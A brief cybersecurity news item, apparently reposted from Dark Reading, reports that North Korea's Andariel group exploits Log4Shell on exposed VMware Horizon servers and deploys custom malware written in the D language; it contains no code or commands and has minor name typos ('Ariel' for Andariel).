North Korean hackers are still exploiting Log4Shell around the world.
Ariel specializes in obtaining initial access and persistence for longer-term espionage campaigns in service of the Kim Jung Un regime.
In some cases it has carried out its own ransomware attacks against healthcare organizations.
As Cisco Talos head of outreach Nick Biasini emphasizes, this is what makes North Korea's hackers most unique.
Ariel's Latest Cyberattacks Andariel's recent attacks began by exploiting exposed VMware Horizon servers carrying Log4Shell, the now 2-year-old historic vulnerability in Apache Log4j.
Next, they created new users with administrative privileges on the host machine, which they used to download credential harvesting software like Mimikatz and, ultimately, their custom malware tools.
These new tools do stand out for being written in D, a 22-year-old offshoot of C++. The Exceptional Range of DPRK Hackers Some hackers achieve stealth with living-off-the-land techniques.
Some use code obfuscation, steganography, and more elaborate tricks.
In contrast, North Korean hackers - more so than anyone else, it seems - resist detection and analysis by building custom malware in bulk, using old, unloved programming languages their adversaries aren't expecting.
Novel malware - which the DPRK creates plenty of - serves to defeat antivirus scans looking for specific signatures, and oddball languages like D add a layer of difficulty for programs trained on more common ones.
It's for this reason that Lazarus attacks demand just a bit of extra vigilance.
This Cyber News was published on www.darkreading.com. Publication date: Mon, 11 Dec 2023 16:25:18 +0000